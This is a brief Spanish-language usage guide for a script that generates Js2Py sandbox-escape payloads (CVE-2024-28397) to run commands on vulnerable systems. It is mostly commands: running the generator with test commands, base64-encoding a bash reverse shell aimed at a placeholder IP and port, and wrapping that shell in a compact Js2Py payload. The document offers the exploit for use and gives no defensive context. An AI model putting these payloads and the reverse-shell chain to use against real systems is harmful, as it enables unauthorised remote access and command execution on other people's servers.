
Genera payloads de JavaScript para explotar el escape de sandbox CVE-2024-28397 de Js2Py, permitiendo la ejecución remota de comandos y shells inversos mediante la exposición de internals de Python.
Este script genera un payload JavaScript que puede ser evaluado por Js2Py en entornos vulnerables donde los internals de Python están expuestos a través de wrappers de objetos.
Ejecución básica de comandos:
python3 cve-2024-28397.py -c "id"
Generar un payload compacto de una línea:
python3 cve-2024-28397.py -c "whoami" --compact
Generar el payload en Base64:
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
Generar el payload de Js2Py:
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
Reemplace BASE64_OUTPUT con la cadena Base64 generada en el primer paso.